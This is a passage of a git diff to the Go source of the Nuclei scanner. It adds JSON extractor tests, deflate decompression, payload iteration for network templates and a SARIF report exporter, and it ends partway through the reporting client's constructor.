exampleRawResponse, event["response"], "could not get correct resp") require.Equal(t, "Test-Response", event["test"], "could not get correct resp for header") @@ -138,7 +138,7 @@ func TestHTTPOperatorExtract(t *testing.T) { matched := "http://example.com/test/?test=1" event := request.responseToDSLMap(resp, host, matched, exampleRawRequest, exampleRawResponse, exampleResponseBody, exampleResponseHeader, 1*time.Second, map[string]interface{}{}) - require.Len(t, event, 12, "could not get correct number of items in dsl map") + require.Len(t, event, 13, "could not get correct number of items in dsl map") require.Equal(t, exampleRawResponse, event["response"], "could not get correct resp") require.Equal(t, "Test-Response", event["test_header"], "could not get correct resp for header") @@ -168,6 +168,47 @@ func TestHTTPOperatorExtract(t *testing.T) { require.Greater(t, len(data), 0, "could not extractor kval valid response") require.Equal(t, map[string]struct{}{"Test-Response": {}}, data, "could not extract correct kval data") }) + + t.Run("json", func(t *testing.T) { + event["body"] = exampleJSONResponseBody + + t.Run("jq-simple", func(t *testing.T) { + extractor := &extractors.Extractor{ + Type: "json", + JSON: []string{".batters | .batter | .[] | .id"}, + } + err = extractor.CompileExtractors() + require.Nil(t, err, "could not compile json extractor") + + data := request.Extract(event, extractor) + require.Greater(t, len(data), 0, "could not extractor json valid response") + require.Equal(t, map[string]struct{}{"1001": {}, "1002": {}, "1003": {}, "1004": {}}, data, "could not extract correct json data") + }) + t.Run("jq-array", func(t *testing.T) { + extractor := &extractors.Extractor{ + Type: "json", + JSON: []string{".array"}, + } + err = extractor.CompileExtractors() + require.Nil(t, err, "could not compile json extractor") + + data := request.Extract(event, extractor) + require.Greater(t, len(data), 0, "could not extractor json valid response") + require.Equal(t, map[string]struct{}{"[\"hello\",\"world\"]": {}}, data, "could not extract correct json data") + }) + t.Run("jq-object", func(t *testing.T) { + extractor := &extractors.Extractor{ + Type: "json", + JSON: []string{".batters"}, + } + err = extractor.CompileExtractors() + require.Nil(t, err, "could not compile json extractor") + + data := request.Extract(event, extractor) + require.Greater(t, len(data), 0, "could not extractor json valid response") + require.Equal(t, map[string]struct{}{"{\"batter\":[{\"id\":\"1001\",\"type\":\"Regular\"},{\"id\":\"1002\",\"type\":\"Chocolate\"},{\"id\":\"1003\",\"type\":\"Blueberry\"},{\"id\":\"1004\",\"type\":\"Devil's Food\"}]}": {}}, data, "could not extract correct json data") + }) + }) } func TestHTTPMakeResult(t *testing.T) { @@ -208,7 +249,7 @@ func TestHTTPMakeResult(t *testing.T) { matched := "http://example.com/test/?test=1" event := request.responseToDSLMap(resp, host, matched, exampleRawRequest, exampleRawResponse, exampleResponseBody, exampleResponseHeader, 1*time.Second, map[string]interface{}{}) - require.Len(t, event, 12, "could not get correct number of items in dsl map") + require.Len(t, event, 13, "could not get correct number of items in dsl map") require.Equal(t, exampleRawResponse, event["response"], "could not get correct resp") require.Equal(t, "Test-Response", event["test"], "could not get correct resp for header") @@ -305,3 +346,63 @@ const exampleResponseBody = ` ` + +const exampleJSONResponseBody = ` +{ + "id": "0001", + "type": "donut", + "name": "Cake", + "ppu": 0.55, + "array": ["hello", "world"], + "batters": { + "batter": [ + { + "id": "1001", + "type": "Regular" + }, + { + "id": "1002", + "type": "Chocolate" + }, + { + "id": "1003", + "type": "Blueberry" + }, + { + "id": "1004", + "type": "Devil's Food" + } + ] + }, + "topping": [ + { + "id": "5001", + "type": "None" + }, + { + "id": "5002", + "type": "Glazed" + }, + { + "id": "5005", + "type": "Sugar" + }, + { + "id": "5007", + "type": "Powdered Sugar" + }, + { + "id": "5006", + "type": "Chocolate with Sprinkles" + }, + { + "id": "5003", + "type": "Chocolate" + }, + { + "id": "5004", + "type": "Maple" + } + ] +} +` diff --git a/v2/pkg/protocols/http/request.go b/v2/pkg/protocols/http/request.go index 6ce71d7baf..0ece585a98 100644 --- a/v2/pkg/protocols/http/request.go +++ b/v2/pkg/protocols/http/request.go @@ -21,6 +21,7 @@ import ( "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/tostring" "github.com/projectdiscovery/nuclei/v2/pkg/protocols/http/httpclientpool" "github.com/projectdiscovery/rawhttp" + "github.com/projectdiscovery/stringsutil" "github.com/remeh/sizedwaitgroup" "go.uber.org/multierr" ) @@ -81,7 +82,7 @@ func (r *Request) executeRaceRequest(reqURL string, previous output.InternalEven } // executeRaceRequest executes parallel requests for a template -func (r *Request) executeParallelHTTP(reqURL string, dynamicValues, previous output.InternalEvent, callback protocols.OutputEventCallback) error { +func (r *Request) executeParallelHTTP(reqURL string, dynamicValues output.InternalEvent, callback protocols.OutputEventCallback) error { generator := r.newGenerator() // Workers that keeps enqueuing new requests @@ -104,6 +105,8 @@ func (r *Request) executeParallelHTTP(reqURL string, dynamicValues, previous out defer swg.Done() r.options.RateLimiter.Take() + + previous := make(map[string]interface{}) err := r.executeRequest(reqURL, httpRequest, previous, callback, 0) mutex.Lock() if err != nil { @@ -117,7 +120,7 @@ func (r *Request) executeParallelHTTP(reqURL string, dynamicValues, previous out return requestErr } -// executeRaceRequest executes turbo http request for a URL +// executeTurboHTTP executes turbo http request for a URL func (r *Request) executeTurboHTTP(reqURL string, dynamicValues, previous output.InternalEvent, callback protocols.OutputEventCallback) error { generator := r.newGenerator() @@ -190,7 +193,7 @@ func (r *Request) ExecuteWithResults(reqURL string, dynamicValues, previous outp // verify if parallel elaboration was requested if r.Threads > 0 { - return r.executeParallelHTTP(reqURL, dynamicValues, previous, callback) + return r.executeParallelHTTP(reqURL, dynamicValues, callback) } generator := r.newGenerator() @@ -229,8 +232,9 @@ func (r *Request) ExecuteWithResults(reqURL string, dynamicValues, previous outp MatchFunc: r.Match, ExtractFunc: r.Extract, }) + } else { + callback(event) } - callback(event) }, requestCount) if err != nil { requestErr = multierr.Append(requestErr, err) @@ -259,28 +263,19 @@ func (r *Request) executeRequest(reqURL string, request *generatedRequest, previ err error ) - // For race conditions we can't dump the request body at this point as it's already waiting the open-gate event, already handled with a similar code within the race function - if !request.original.Race { - dumpedRequest, err = dump(request, reqURL) - if err != nil { - return err - } - - if r.options.Options.Debug || r.options.Options.DebugRequests { - gologger.Info().Msgf("[%s] Dumped HTTP request for %s\n\n", r.options.TemplateID, reqURL) - gologger.Print().Msgf("%s", string(dumpedRequest)) - } - } - var formedURL string var hostname string timeStart := time.Now() if request.original.Pipeline { - formedURL = request.rawRequest.FullURL - if parsed, parseErr := url.Parse(formedURL); parseErr == nil { - hostname = parsed.Host + if request.rawRequest != nil { + formedURL = request.rawRequest.FullURL + if parsed, parseErr := url.Parse(formedURL); parseErr == nil { + hostname = parsed.Host + } + resp, err = request.pipelinedClient.DoRaw(request.rawRequest.Method, reqURL, request.rawRequest.Path, generators.ExpandMapValues(request.rawRequest.Headers), ioutil.NopCloser(strings.NewReader(request.rawRequest.Data))) + } else if request.request != nil { + resp, err = request.pipelinedClient.Dor(request.request) } - resp, err = request.pipelinedClient.DoRaw(request.rawRequest.Method, reqURL, request.rawRequest.Path, generators.ExpandMapValues(request.rawRequest.Headers), ioutil.NopCloser(strings.NewReader(request.rawRequest.Data))) } else if request.original.Unsafe && request.rawRequest != nil { formedURL = request.rawRequest.FullURL if parsed, parseErr := url.Parse(formedURL); parseErr == nil { @@ -306,6 +301,20 @@ func (r *Request) executeRequest(reqURL string, request *generatedRequest, previ resp, err = r.httpClient.Do(request.request) } } + + // For race conditions we can't dump the request body at this point as it's already waiting the open-gate event, already handled with a similar code within the race function + if !request.original.Race { + dumpedRequest, err = dump(request, reqURL) + if err != nil { + return err + } + + if r.options.Options.Debug || r.options.Options.DebugRequests { + gologger.Info().Msgf("[%s] Dumped HTTP request for %s\n\n", r.options.TemplateID, reqURL) + gologger.Print().Msgf("%s", string(dumpedRequest)) + } + } + if resp == nil { err = errors.New("no response got for request") } @@ -342,7 +351,12 @@ func (r *Request) executeRequest(reqURL string, request *generatedRequest, previ } data, err := ioutil.ReadAll(bodyReader) if err != nil { - return errors.Wrap(err, "could not read http body") + // Ignore body read due to server misconfiguration errors + if stringsutil.ContainsAny(err.Error(), "gzip: invalid header") { + gologger.Warning().Msgf("[%s] Server sent an invalid gzip header and it was not possible to read the uncompressed body for %s: %s", r.options.TemplateID, formedURL, err.Error()) + } else if !stringsutil.ContainsAny(err.Error(), "unexpected EOF") { // ignore EOF error + return errors.Wrap(err, "could not read http body") + } } resp.Body.Close() @@ -355,7 +369,11 @@ func (r *Request) executeRequest(reqURL string, request *generatedRequest, previ // encoding has been specified by the user in the request so in case we have to // manually do it. dataOrig := data - data, _ = handleDecompression(resp, data) + data, err = handleDecompression(resp, data) + // in case of error use original data + if err != nil { + data = dataOrig + } // Dump response - step 2 - replace gzip body with deflated one or with itself (NOP operation) dumpedResponseBuilder := &bytes.Buffer{} @@ -409,16 +427,14 @@ func (r *Request) executeRequest(reqURL string, request *generatedRequest, previ } event := &output.InternalWrappedEvent{InternalEvent: outputEvent} - if !interactsh.HasMatchers(r.CompiledOperators) { - if r.CompiledOperators != nil { - var ok bool - event.OperatorsResult, ok = r.CompiledOperators.Execute(finalEvent, r.Match, r.Extract) - if ok && event.OperatorsResult != nil { - event.OperatorsResult.PayloadValues = request.meta - event.Results = r.MakeResultEvent(event) - } - event.InternalEvent = outputEvent + if r.CompiledOperators != nil { + var ok bool + event.OperatorsResult, ok = r.CompiledOperators.Execute(finalEvent, r.Match, r.Extract) + if ok && event.OperatorsResult != nil { + event.OperatorsResult.PayloadValues = request.meta + event.Results = r.MakeResultEvent(event) } + event.InternalEvent = outputEvent } callback(event) return nil diff --git a/v2/pkg/protocols/http/utils.go b/v2/pkg/protocols/http/utils.go index fa9747097d..95a27e7ef5 100644 --- a/v2/pkg/protocols/http/utils.go +++ b/v2/pkg/protocols/http/utils.go @@ -3,6 +3,8 @@ package http import ( "bytes" "compress/gzip" + "compress/zlib" + "io" "io/ioutil" "net/http" "net/http/httputil" @@ -100,19 +102,23 @@ func handleDecompression(resp *http.Response, bodyOrig []byte) (bodyDec []byte, return bodyOrig, nil } - encodingHeader := strings.TrimSpace(strings.ToLower(resp.Header.Get("Content-Encoding"))) - if strings.Contains(encodingHeader, "gzip") { - gzipreader, err := gzip.NewReader(bytes.NewReader(bodyOrig)) - if err != nil { - return bodyOrig, err - } - defer gzipreader.Close() + var reader io.ReadCloser + switch resp.Header.Get("Content-Encoding") { + case "gzip": + reader, err = gzip.NewReader(bytes.NewReader(bodyOrig)) + case "deflate": + reader, err = zlib.NewReader(bytes.NewReader(bodyOrig)) + default: + return bodyOrig, nil + } + if err != nil { + return nil, err + } + defer reader.Close() - bodyDec, err = ioutil.ReadAll(gzipreader) - if err != nil { - return bodyOrig, err - } - return bodyDec, nil + bodyDec, err = ioutil.ReadAll(reader) + if err != nil { + return bodyOrig, err } - return bodyOrig, nil + return bodyDec, nil } diff --git a/v2/pkg/protocols/network/network.go b/v2/pkg/protocols/network/network.go index a0dd61cad1..196fcbcde3 100644 --- a/v2/pkg/protocols/network/network.go +++ b/v2/pkg/protocols/network/network.go @@ -9,6 +9,7 @@ import ( "github.com/projectdiscovery/nuclei/v2/pkg/operators" "github.com/projectdiscovery/nuclei/v2/pkg/protocols" "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions" + "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/generators" "github.com/projectdiscovery/nuclei/v2/pkg/protocols/network/networkclientpool" ) @@ -20,6 +21,12 @@ type Request struct { Address []string `yaml:"host"` addresses []addressKV + // AttackType is the attack type + // Sniper, PitchFork and ClusterBomb. Default is Sniper + AttackType string `yaml:"attack"` + // Path contains the path/s for the request variables + Payloads map[string]interface{} `yaml:"payloads"` + // Payload is the payload to send for the network request Inputs []*Input `yaml:"inputs"` // ReadSize is the size of response to read (1024 if not provided by default) @@ -29,6 +36,8 @@ type Request struct { operators.Operators `yaml:",inline,omitempty"` CompiledOperators *operators.Operators + generator *generators.Generator + attackType generators.Type // cache any variables that may be needed for operation. dialer *fastdialer.Dialer options *protocols.ExecuterOptions @@ -62,6 +71,7 @@ func (r *Request) Compile(options *protocols.ExecuterOptions) error { var shouldUseTLS bool var err error + r.options = options for _, address := range r.Address { // check if the connection should be encrypted if strings.HasPrefix(address, "tls://") { @@ -88,6 +98,30 @@ func (r *Request) Compile(options *protocols.ExecuterOptions) error { } } + if len(r.Payloads) > 0 { + attackType := r.AttackType + if attackType == "" { + attackType = "sniper" + } + r.attackType = generators.StringToType[attackType] + + // Resolve payload paths if they are files. + for name, payload := range r.Payloads { + payloadStr, ok := payload.(string) + if ok { + final, resolveErr := options.Catalog.ResolvePath(payloadStr, options.TemplatePath) + if resolveErr != nil { + return errors.Wrap(resolveErr, "could not read payload file") + } + r.Payloads[name] = final + } + } + r.generator, err = generators.New(r.Payloads, r.attackType, r.options.TemplatePath) + if err != nil { + return errors.Wrap(err, "could not parse payloads") + } + } + // Create a client for the class client, err := networkclientpool.Get(options.Options, &networkclientpool.Configuration{}) if err != nil { @@ -102,7 +136,6 @@ func (r *Request) Compile(options *protocols.ExecuterOptions) error { } r.CompiledOperators = compiled } - r.options = options return nil } diff --git a/v2/pkg/protocols/network/operators.go b/v2/pkg/protocols/network/operators.go index a0a95ede99..e056ca96b8 100644 --- a/v2/pkg/protocols/network/operators.go +++ b/v2/pkg/protocols/network/operators.go @@ -73,6 +73,7 @@ func (r *Request) responseToDSLMap(req, resp, raw, host, matched string) output. data["raw"] = raw // Raw is the full transaction data for network data["template-id"] = r.options.TemplateID data["template-info"] = r.options.TemplateInfo + data["template-path"] = r.options.TemplatePath return data } @@ -107,11 +108,13 @@ func (r *Request) MakeResultEvent(wrapped *output.InternalWrappedEvent) []*outpu func (r *Request) makeResultEventItem(wrapped *output.InternalWrappedEvent) *output.ResultEvent { data := &output.ResultEvent{ TemplateID: types.ToString(wrapped.InternalEvent["template-id"]), + TemplatePath: types.ToString(wrapped.InternalEvent["template-path"]), Info: wrapped.InternalEvent["template-info"].(map[string]interface{}), Type: "network", Host: types.ToString(wrapped.InternalEvent["host"]), Matched: types.ToString(wrapped.InternalEvent["matched"]), ExtractedResults: wrapped.OperatorsResult.OutputExtracts, + Metadata: wrapped.OperatorsResult.PayloadValues, Timestamp: time.Now(), IP: types.ToString(wrapped.InternalEvent["ip"]), } diff --git a/v2/pkg/protocols/network/operators_test.go b/v2/pkg/protocols/network/operators_test.go index e729c777e6..a8b64ddd1a 100644 --- a/v2/pkg/protocols/network/operators_test.go +++ b/v2/pkg/protocols/network/operators_test.go @@ -32,7 +32,7 @@ func TestResponseToDSLMap(t *testing.T) { req := "test-data\r\n" resp := "resp-data\r\n" event := request.responseToDSLMap(req, resp, "test", "one.one.one.one", "one.one.one.one") - require.Len(t, event, 7, "could not get correct number of items in dsl map") + require.Len(t, event, 8, "could not get correct number of items in dsl map") require.Equal(t, resp, event["data"], "could not get correct resp") } diff --git a/v2/pkg/protocols/network/request.go b/v2/pkg/protocols/network/request.go index 7db9fca965..98f9e744d5 100644 --- a/v2/pkg/protocols/network/request.go +++ b/v2/pkg/protocols/network/request.go @@ -13,6 +13,7 @@ import ( "github.com/projectdiscovery/gologger" "github.com/projectdiscovery/nuclei/v2/pkg/output" "github.com/projectdiscovery/nuclei/v2/pkg/protocols" + "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/expressions" "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/interactsh" "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/replacer" ) @@ -55,6 +56,28 @@ func (r *Request) executeAddress(actualAddress, address, input string, shouldUse return err } + if r.generator != nil { + iterator := r.generator.NewIterator() + + for { + value, ok := iterator.Value() + if !ok { + break + } + if err := r.executeRequestWithPayloads(actualAddress, address, input, shouldUseTLS, value, previous, callback); err != nil { + return err + } + } + } else { + value := make(map[string]interface{}) + if err := r.executeRequestWithPayloads(actualAddress, address, input, shouldUseTLS, value, previous, callback); err != nil { + return err + } + } + return nil +} + +func (r *Request) executeRequestWithPayloads(actualAddress, address, input string, shouldUseTLS bool, payloads map[string]interface{}, previous output.InternalEvent, callback protocols.OutputEventCallback) error { var ( hostname string conn net.Conn @@ -106,9 +129,16 @@ func (r *Request) executeAddress(actualAddress, address, input string, shouldUse return errors.Wrap(err, "could not write request to server") } reqBuilder.Grow(len(input.Data)) - reqBuilder.WriteString(input.Data) - _, err = conn.Write(data) + finalData, dataErr := expressions.EvaluateByte(data, payloads) + if dataErr != nil { + r.options.Output.Request(r.options.TemplateID, address, "network", dataErr) + r.options.Progress.IncrementFailedRequestsBy(1) + return errors.Wrap(dataErr, "could not evaluate template expressions") + } + reqBuilder.Write(finalData) + + _, err = conn.Write(finalData) if err != nil { r.options.Output.Request(r.options.TemplateID, address, "network", err) r.options.Progress.IncrementFailedRequestsBy(1) @@ -119,16 +149,27 @@ func (r *Request) executeAddress(actualAddress, address, input string, shouldUse buffer := make([]byte, input.Read) n, _ := conn.Read(buffer) responseBuilder.Write(buffer[:n]) + + bufferStr := string(buffer[:n]) if input.Name != "" { - inputEvents[input.Name] = string(buffer[:n]) + inputEvents[input.Name] = bufferStr + } + + // Run any internal extractors for the request here and add found values to map. + if r.CompiledOperators != nil { + values := r.CompiledOperators.ExecuteInternalExtractors(map[string]interface{}{input.Name: bufferStr}, r.Extract) + for k, v := range values { + payloads[k] = v + } } } } r.options.Progress.IncrementRequests() if r.options.Options.Debug || r.options.Options.DebugRequests { + requestOutput := reqBuilder.String() gologger.Info().Str("address", actualAddress).Msgf("[%s] Dumped Network request for %s", r.options.TemplateID, actualAddress) - gologger.Print().Msgf("%s", reqBuilder.String()) + gologger.Print().Msgf("%s\nHex: %s", requestOutput, hex.EncodeToString([]byte(requestOutput))) } r.options.Output.Request(r.options.TemplateID, actualAddress, "network", err) @@ -147,39 +188,42 @@ func (r *Request) executeAddress(actualAddress, address, input string, shouldUse responseBuilder.Write(final[:n]) if r.options.Options.Debug || r.options.Options.DebugResponse { + responseOutput := responseBuilder.String() gologger.Debug().Msgf("[%s] Dumped Network response for %s", r.options.TemplateID, actualAddress) - gologger.Print().Msgf("%s", responseBuilder.String()) + gologger.Print().Msgf("%s\nHex: %s", responseOutput, hex.EncodeToString([]byte(responseOutput))) } outputEvent := r.responseToDSLMap(reqBuilder.String(), string(final[:n]), responseBuilder.String(), input, actualAddress) outputEvent["ip"] = r.dialer.GetDialedIP(hostname) for k, v := range previous { outputEvent[k] = v } + for k, v := range payloads { + outputEvent[k] = v + } for k, v := range inputEvents { outputEvent[k] = v } event := &output.InternalWrappedEvent{InternalEvent: outputEvent} - if !hasInteractMarkers { + if interactURL == "" { if r.CompiledOperators != nil { result, ok := r.CompiledOperators.Execute(outputEvent, r.Match, r.Extract) if ok && result != nil { event.OperatorsResult = result + event.OperatorsResult.PayloadValues = payloads event.Results = r.MakeResultEvent(event) } } - } else { - if r.options.Interactsh != nil { - r.options.Interactsh.RequestEvent(interactURL, &interactsh.RequestData{ - MakeResultFunc: r.MakeResultEvent, - Event: event, - Operators: r.CompiledOperators, - MatchFunc: r.Match, - ExtractFunc: r.Extract, - }) - } + callback(event) + } else if r.options.Interactsh != nil { + r.options.Interactsh.RequestEvent(interactURL, &interactsh.RequestData{ + MakeResultFunc: r.MakeResultEvent, + Event: event, + Operators: r.CompiledOperators, + MatchFunc: r.Match, + ExtractFunc: r.Extract, + }) } - callback(event) return nil } diff --git a/v2/pkg/protocols/offlinehttp/operators.go b/v2/pkg/protocols/offlinehttp/operators.go index c71376c991..d60cf72f82 100644 --- a/v2/pkg/protocols/offlinehttp/operators.go +++ b/v2/pkg/protocols/offlinehttp/operators.go @@ -101,6 +101,7 @@ func (r *Request) responseToDSLMap(resp *http.Response, host, matched, rawReq, r data["duration"] = duration.Seconds() data["template-id"] = r.options.TemplateID data["template-info"] = r.options.TemplateInfo + data["template-path"] = r.options.TemplatePath return data } @@ -135,6 +136,7 @@ func (r *Request) MakeResultEvent(wrapped *output.InternalWrappedEvent) []*outpu func (r *Request) makeResultEventItem(wrapped *output.InternalWrappedEvent) *output.ResultEvent { data := &output.ResultEvent{ TemplateID: types.ToString(wrapped.InternalEvent["template-id"]), + TemplatePath: types.ToString(wrapped.InternalEvent["template-path"]), Info: wrapped.InternalEvent["template-info"].(map[string]interface{}), Type: "http", Path: types.ToString(wrapped.InternalEvent["path"]), diff --git a/v2/pkg/protocols/offlinehttp/operators_test.go b/v2/pkg/protocols/offlinehttp/operators_test.go index c685315c56..f557317163 100644 --- a/v2/pkg/protocols/offlinehttp/operators_test.go +++ b/v2/pkg/protocols/offlinehttp/operators_test.go @@ -34,7 +34,7 @@ func TestResponseToDSLMap(t *testing.T) { matched := "http://example.com/test/?test=1" event := request.responseToDSLMap(resp, host, matched, exampleRawRequest, exampleRawResponse, exampleResponseBody, exampleResponseHeader, 1*time.Second, map[string]interface{}{}) - require.Len(t, event, 12, "could not get correct number of items in dsl map") + require.Len(t, event, 13, "could not get correct number of items in dsl map") require.Equal(t, exampleRawResponse, event["response"], "could not get correct resp") require.Equal(t, "Test-Response", event["test"], "could not get correct resp for header") } @@ -60,7 +60,7 @@ func TestHTTPOperatorMatch(t *testing.T) { matched := "http://example.com/test/?test=1" event := request.responseToDSLMap(resp, host, matched, exampleRawRequest, exampleRawResponse, exampleResponseBody, exampleResponseHeader, 1*time.Second, map[string]interface{}{}) - require.Len(t, event, 12, "could not get correct number of items in dsl map") + require.Len(t, event, 13, "could not get correct number of items in dsl map") require.Equal(t, exampleRawResponse, event["response"], "could not get correct resp") require.Equal(t, "Test-Response", event["test"], "could not get correct resp for header") @@ -126,7 +126,7 @@ func TestHTTPOperatorExtract(t *testing.T) { matched := "http://example.com/test/?test=1" event := request.responseToDSLMap(resp, host, matched, exampleRawRequest, exampleRawResponse, exampleResponseBody, exampleResponseHeader, 1*time.Second, map[string]interface{}{}) - require.Len(t, event, 12, "could not get correct number of items in dsl map") + require.Len(t, event, 13, "could not get correct number of items in dsl map") require.Equal(t, exampleRawResponse, event["response"], "could not get correct resp") require.Equal(t, "Test-Response", event["test-header"], "could not get correct resp for header") @@ -191,7 +191,7 @@ func TestHTTPMakeResult(t *testing.T) { matched := "http://example.com/test/?test=1" event := request.responseToDSLMap(resp, host, matched, exampleRawRequest, exampleRawResponse, exampleResponseBody, exampleResponseHeader, 1*time.Second, map[string]interface{}{}) - require.Len(t, event, 12, "could not get correct number of items in dsl map") + require.Len(t, event, 13, "could not get correct number of items in dsl map") require.Equal(t, exampleRawResponse, event["response"], "could not get correct resp") require.Equal(t, "Test-Response", event["test"], "could not get correct resp for header") diff --git a/v2/pkg/reporting/exporters/disk/disk.go b/v2/pkg/reporting/exporters/disk/disk.go index 5884615e33..d29799a34d 100644 --- a/v2/pkg/reporting/exporters/disk/disk.go +++ b/v2/pkg/reporting/exporters/disk/disk.go @@ -58,3 +58,8 @@ func (i *Exporter) Export(event *output.ResultEvent) error { err := ioutil.WriteFile(filepath.Join(i.directory, finalFilename), data, 0644) return err } + +// Close closes the exporter after operation +func (i *Exporter) Close() error { + return nil +} diff --git a/v2/pkg/reporting/exporters/sarif/sarif.go b/v2/pkg/reporting/exporters/sarif/sarif.go new file mode 100644 index 0000000000..84c070b845 --- /dev/null +++ b/v2/pkg/reporting/exporters/sarif/sarif.go @@ -0,0 +1,143 @@ +package sarif + +import ( + "crypto/sha1" + "encoding/hex" + "os" + "path" + "strings" + "sync" + + "github.com/owenrumney/go-sarif/sarif" + "github.com/pkg/errors" + "github.com/projectdiscovery/nuclei/v2/pkg/output" + "github.com/projectdiscovery/nuclei/v2/pkg/reporting/format" +) + +// Exporter is an exporter for nuclei sarif output format. +type Exporter struct { + sarif *sarif.Report + run *sarif.Run + mutex *sync.Mutex + + home string + options *Options +} + +// Options contains the configuration options for sarif exporter client +type Options struct { + // File is the file to export found sarif result to + File string `yaml:"file"` +} + +// New creates a new disk exporter integration client based on options. +func New(options *Options) (*Exporter, error) { + report, err := sarif.New(sarif.Version210) + if err != nil { + return nil, errors.Wrap(err, "could not create sarif exporter") + } + + home, err := os.UserHomeDir() + if err != nil { + return nil, errors.Wrap(err, "could not get home dir") + } + templatePath := path.Join(home, "nuclei-templates") + + run := sarif.NewRun("nuclei", "https://github.com/projectdiscovery/nuclei") + return &Exporter{options: options, home: templatePath, sarif: report, run: run, mutex: &sync.Mutex{}}, nil +} + +// Export exports a passed result event to sarif structure +func (i *Exporter) Export(event *output.ResultEvent) error { + templatePath := strings.TrimPrefix(event.TemplatePath, i.home) + + h := sha1.New() + h.Write([]byte(event.Host)) + templateID := event.TemplateID + "-" + hex.EncodeToString(h.Sum(nil)) + + fullDescription := format.MarkdownDescription(event) + sarifSeverity := getSarifSeverity(event) + + var ruleName string + if s, ok := event.Info["name"]; ok { + ruleName = s.(string) + } + + var templateURL string + if strings.HasPrefix(event.TemplatePath, i.home) { + templateURL = "https://github.com/projectdiscovery/nuclei-templates/blob/master" + templatePath + } else { + templateURL = "https://github.com/projectdiscovery/nuclei-templates" + } + + var ruleDescription string + if d, ok := event.Info["description"]; ok { + ruleDescription = d.(string) + } + + i.mutex.Lock() + defer i.mutex.Unlock() + + _ = i.run.AddRule(templateID). + WithDescription(ruleName). + WithHelp(fullDescription). + WithHelpURI(templateURL). + WithFullDescription(sarif.NewMultiformatMessageString(ruleDescription)) + result := i.run.AddResult(templateID). + WithMessage(sarif.NewMessage().WithText(event.Host)). + WithLevel(sarifSeverity) + + // Also write file match metadata to file + if event.Type == "file" && (event.FileToIndexPosition != nil && len(event.FileToIndexPosition) > 0) { + for file, line := range event.FileToIndexPosition { + result.WithLocation(sarif.NewLocation().WithMessage(sarif.NewMessage().WithText(ruleName)).WithPhysicalLocation( + sarif.NewPhysicalLocation(). + WithArtifactLocation(sarif.NewArtifactLocation().WithUri(file)). + WithRegion(sarif.NewRegion().WithStartColumn(1).WithStartLine(line).WithEndLine(line).WithEndColumn(32)), + )) + } + } else { + result.WithLocation(sarif.NewLocation().WithMessage(sarif.NewMessage().WithText(event.Host)).WithPhysicalLocation( + sarif.NewPhysicalLocation(). + WithArtifactLocation(sarif.NewArtifactLocation().WithUri("README.md")). + WithRegion(sarif.NewRegion().WithStartColumn(1).WithStartLine(1).WithEndLine(1).WithEndColumn(1)), + )) + } + return nil +} + +// getSarifSeverity returns the sarif severity +func getSarifSeverity(event *output.ResultEvent) string { + var ruleSeverity string + if s, ok := event.Info["severity"]; ok { + ruleSeverity = s.(string) + } + + switch ruleSeverity { + case "info": + return "note" + case "low", "medium": + return "warning" + case "high", "critical": + return "error" + default: + return "note" + } +} + +// Close closes the exporter after operation +func (i *Exporter) Close() error { + i.mutex.Lock() + defer i.mutex.Unlock() + + i.sarif.AddRun(i.run) + if len(i.run.Results) == 0 { + return nil // do not write when no results + } + file, err := os.Create(i.options.File) + if err != nil { + return errors.Wrap(err, "could not create sarif output file") + } + defer file.Close() + return i.sarif.Write(file) +} diff --git a/v2/pkg/reporting/format/format.go b/v2/pkg/reporting/format/format.go index 153b6c24ce..ec09979555 100644 --- a/v2/pkg/reporting/format/format.go +++ b/v2/pkg/reporting/format/format.go @@ -44,6 +44,9 @@ func MarkdownDescription(event *output.ResultEvent) string { builder.WriteString(event.Timestamp.Format("Mon Jan 2 15:04:05 -0700 MST 2006")) builder.WriteString("\n\n**Template Information**\n\n| Key | Value |\n|---|---|\n") for k, v := range event.Info { + if k == "reference" { + continue + } builder.WriteString(fmt.Sprintf("| %s | %s |\n", k, v)) } if event.Request != "" { @@ -60,11 +63,11 @@ func MarkdownDescription(event *output.ResultEvent) string { } else { builder.WriteString(event.Response) } - builder.WriteString("\n```\n\n") + builder.WriteString("\n```\n") } if len(event.ExtractedResults) > 0 || len(event.Metadata) > 0 { - builder.WriteString("**Extra Information**\n\n") + builder.WriteString("\n**Extra Information**\n\n") if len(event.ExtractedResults) > 0 { builder.WriteString("**Extracted results**:\n\n") for _, v := range event.ExtractedResults { @@ -110,6 +113,26 @@ func MarkdownDescription(event *output.ResultEvent) string { builder.WriteString("\n```\n") } } + if d, ok := event.Info["reference"]; ok { + builder.WriteString("\nReference: \n") + + switch v := d.(type) { + case string: + if !strings.HasPrefix(v, "-") { + builder.WriteString("- ") + } + builder.WriteString(v) + case []interface{}: + slice := types.ToStringSlice(v) + for i, item := range slice { + builder.WriteString("- ") + builder.WriteString(item) + if len(slice)-1 != i { + builder.WriteString("\n") + } + } + } + } builder.WriteString("\n---\nGenerated by [Nuclei](https://github.com/projectdiscovery/nuclei)") data := builder.String() diff --git a/v2/pkg/reporting/reporting.go b/v2/pkg/reporting/reporting.go index e33600bb04..22415ae3b5 100644 --- a/v2/pkg/reporting/reporting.go +++ b/v2/pkg/reporting/reporting.go @@ -7,6 +7,7 @@ import ( "github.com/projectdiscovery/nuclei/v2/pkg/output" "github.com/projectdiscovery/nuclei/v2/pkg/reporting/dedupe" "github.com/projectdiscovery/nuclei/v2/pkg/reporting/exporters/disk" + "github.com/projectdiscovery/nuclei/v2/pkg/reporting/exporters/sarif" "github.com/projectdiscovery/nuclei/v2/pkg/reporting/trackers/github" "github.com/projectdiscovery/nuclei/v2/pkg/reporting/trackers/gitlab" "github.com/projectdiscovery/nuclei/v2/pkg/reporting/trackers/jira" @@ -28,6 +29,8 @@ type Options struct { Jira *jira.Options `yaml:"jira"` // DiskExporter contains configuration options for Disk Exporter Module DiskExporter *disk.Options `yaml:"disk"` + // SarifExporter contains configuration options for Sarif Exporter Module + SarifExporter *sarif.Options `yaml:"sarif"` } // Filter filters the received event and decides whether to perform @@ -79,6 +82,8 @@ type Tracker interface { // Exporter is an interface implemented by an issue exporter type Exporter interface { + // Close closes the exporter after operation + Close() error // Export exports an issue to an exporter Export(event *output.ResultEvent) error } @@ -93,6 +98,10 @@ type Client struct { // New creates a new nuclei issue tracker reporting client func New(options *Options, db string) (*Client, error) { + if options == nil { + return nil, errors.New("no options passed") 